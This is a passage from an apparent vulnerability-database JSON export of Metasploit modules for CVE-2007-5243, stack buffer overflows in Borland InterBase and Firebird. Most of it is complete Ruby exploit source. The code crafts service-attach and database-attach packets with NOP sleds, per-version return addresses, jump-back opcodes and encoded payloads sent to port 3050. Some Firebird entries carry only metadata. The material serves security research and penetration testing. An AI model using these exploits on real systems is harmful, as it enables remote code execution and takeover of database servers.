Opt::RPORT(3050)\n ],\n self.class\n )\n\n end\n\n def exploit\n\n connect\n\n # Attach database\n op_attach = 19\n\n length = 1152\n remainder = length.remainder(4)\n padding = 0\n\n if remainder > 0\n padding = (4 - remainder)\n end\n\n buf = ''\n\n # Operation/packet type\n buf << [op_attach].pack('N')\n\n # Id\n buf << [0].pack('N')\n\n # Length\n buf << [length].pack('N')\n\n # It will return into this nop block\n buf << make_nops(length - payload.encoded.length - 4)\n\n # Payload\n buf << payload.encoded\n\n # Target\n buf << [target.ret].pack('V')\n\n # Padding\n buf << \"\\x00\" * padding\n\n # Length\n buf << [1024].pack('N')\n\n # Random alpha data\n buf << rand_text_alpha(1024)\n\n sock.put(buf)\n\n handler\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/ib_pwd_db_aliased.rb"}, {"lastseen": "2020-08-18T00:32:23", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.\n", "published": "2007-10-04T03:03:13", "type": "metasploit", "title": "Borland InterBase INET_connect() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/LINUX/MISC/IB_INET_CONNECT", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'Borland InterBase INET_connect() Buffer Overflow',\n 'Description'\t=> %q{\n This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.\n },\n 'Author'\t=>\n [\n 'Ramon de C Valle',\n 'Adriano Lima <adriano[at]risesecurity.org>',\n ],\n 'Arch'\t\t=> ARCH_X86,\n 'Platform'\t=> 'linux',\n 'References'\t=>\n [\n [ 'CVE', '2007-5243' ],\n [ 'OSVDB', '38605' ],\n [ 'BID', '25917' ],\n [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\n ],\n 'Privileged'\t=> true,\n 'License'\t=> MSF_LICENSE,\n 'Payload'\t=>\n {\n 'Space' => 512,\n 'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\n },\n 'Targets'\t=>\n [\n # 0x0804d2ee 5b5e5f5dc3\n [\n 'Borland InterBase LI-V8.0.0.53 LI-V8.0.0.54 LI-V8.1.0.253',\n { 'Ret' => 0x0804d2ee }\n ],\n ],\n 'DefaultTarget'\t=> 0,\n 'DisclosureDate' => 'Oct 03 2007'\n ))\n\n register_options(\n [\n Opt::RPORT(3050)\n ],\n self.class\n )\n\n end\n\n def exploit\n\n connect\n\n # Attach database\n op_attach = 19\n\n # Create database\n op_create = 20\n\n # Service attach\n op_service_attach = 82\n\n length = 161\n remainder = length.remainder(4)\n padding = 0\n\n if remainder > 0\n padding = (4 - remainder)\n end\n\n buf = ''\n\n # Operation/packet type\n buf << [op_service_attach].pack('N')\n\n # Id\n buf << [0].pack('N')\n\n # Length\n buf << [length].pack('N')\n\n # Random alpha data\n buf << rand_text_alpha(length - 5)\n\n # Target\n buf << [target.ret].pack('L')\n\n # Separator\n buf << ':'\n\n # Padding\n buf << \"\\x00\" * padding\n\n # Database parameter block\n\n # Length\n buf << [1024].pack('N')\n\n # It will return into this nop block\n buf << make_nops(1024 - payload.encoded.length)\n\n # Payload\n buf << payload.encoded\n\n sock.put(buf)\n\n handler\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/misc/ib_inet_connect.rb"}, {"lastseen": "2020-10-06T04:58:57", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted create request.\n", "published": "2007-10-04T03:03:13", "type": "metasploit", "title": "Firebird Relational Database isc_create_database() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/FB_ISC_CREATE_DATABASE", "href": "", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/fb_isc_create_database.rb"}, {"lastseen": "2020-07-19T04:25:26", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.\n", "published": "2007-10-04T03:03:13", "type": "metasploit", "title": "Borland InterBase SVC_attach() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/IB_SVC_ATTACH", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::BruteTargets\n\n def initialize(info = {})\n super(update_info(info,\n 'Name'\t\t=> 'Borland InterBase SVC_attach() Buffer Overflow',\n 'Description'\t=> %q{\n This module exploits a stack buffer overflow in Borland InterBase\n by sending a specially crafted service attach request.\n },\n 'Author'\t=>\n [\n 'Ramon de C Valle',\n 'Adriano Lima <adriano[at]risesecurity.org>',\n ],\n 'Arch'\t\t=> ARCH_X86,\n 'Platform'\t=> 'win',\n 'References'\t=>\n [\n [ 'CVE', '2007-5243' ],\n [ 'OSVDB', '38605' ],\n [ 'BID', '25917' ],\n [ 'URL', 'http://www.risesecurity.org/advisories/RISE-2007002.txt' ],\n ],\n 'Privileged'\t=> true,\n 'License'\t=> MSF_LICENSE,\n 'Payload'\t=>\n {\n 'Space' => 512,\n 'BadChars' => \"\\x00\\x2f\\x3a\\x40\\x5c\",\n 'StackAdjustment' => -3500,\n },\n 'Targets'\t=>\n [\n [ 'Brute Force', { } ],\n # 0x00403d4b pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V8.1.0.257',\n { 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4b }\n ],\n # 0x00403d4d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V8.0.0.123',\n { 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403d4d }\n ],\n # 0x00403a5d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V7.5.0.129 WI-V7.5.1.80',\n { 'Length' => [ 3660, 3664 ], 'Ret' => 0x00403a5d }\n ],\n # 0x004038fd pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V7.0.1.1',\n { 'Length' => [ 3660, 3664 ], 'Ret' => 0x004038fd }\n ],\n # 0x0040390d pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.5.0.28',\n { 'Length' => [ 2116, 2120], 'Ret' => 0x0040390d }\n ],\n # 0x00403901 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.0.1.6',\n { 'Length' => [ 2116, 2120 ], 'Ret' => 0x00403901 }\n ],\n # 0x004038b1 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V6.0.0.627 WI-V6.0.1.0 WI-O6.0.1.6 WI-O6.0.2.0',\n { 'Length' => [ 2116, 2120 ], 'Ret' => 0x004038b1 }\n ],\n # 0x00404a10 pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V5.5.0.742',\n { 'Length' => [ 2216, 2120 ], 'Ret' => 0x00404a10 }\n ],\n # 0x00404a0e pop esi; pop ebp; ret\n [\n 'Borland InterBase WI-V5.1.1.680',\n { 'Length' => [ 2120, 2124 ], 'Ret' => 0x00404a0e }\n ],\n # Debug\n [\n 'Debug',\n { 'Length' => [ 2120 ], 'Ret' => 0xaabbccdd }\n ],\n ],\n 'DefaultTarget'\t=> 0,\n 'DisclosureDate' => 'Oct 03 2007'\n ))\n\n register_options(\n [\n Opt::RPORT(3050)\n ],\n self.class\n )\n\n end\n\n def exploit_target(target)\n\n target['Length'].each do |length|\n\n connect\n\n # Service attach\n op_service_attach = 82\n\n remainder = length.remainder(4)\n padding = 0\n\n if remainder > 0\n padding = (4 - remainder)\n end\n\n buf = ''\n\n # Operation/packet type\n buf << [op_service_attach].pack('N')\n\n # Id\n buf << [0].pack('N')\n\n # Length\n buf << [length].pack('N')\n\n # Nop block\n buf << make_nops(length - payload.encoded.length - 13)\n\n # Payload\n buf << payload.encoded\n\n # Jump back into the nop block\n buf << \"\\xe9\" + [-1028].pack('V')\n\n # Jump back\n buf << \"\\xeb\" + [-7].pack('c')\n\n # Random alpha data\n buf << rand_text_alpha(2)\n\n # Target\n buf << [target.ret].pack('V')\n\n # Padding\n buf << \"\\x00\" * padding\n\n # Database parameter block\n\n # Length\n buf << [1024].pack('N')\n\n # Random alpha data\n buf << rand_text_alpha(1024)\n\n sock.put(buf)\n\n select(nil,nil,nil,4)\n\n handler\n\n end\n\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/ib_svc_attach.rb"}, {"lastseen": "2020-10-06T04:56:45", "description": "This module exploits a stack buffer overflow in Borland InterBase by sending a specially crafted service attach request.\n", "published": "2007-10-04T03:03:13", "type": "metasploit", "title": "Firebird Relational Database SVC_attach() Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2007-5243"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/MISC/FB_SVC_ATTACH", "href": "", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/misc/fb_svc_attach.rb"}]}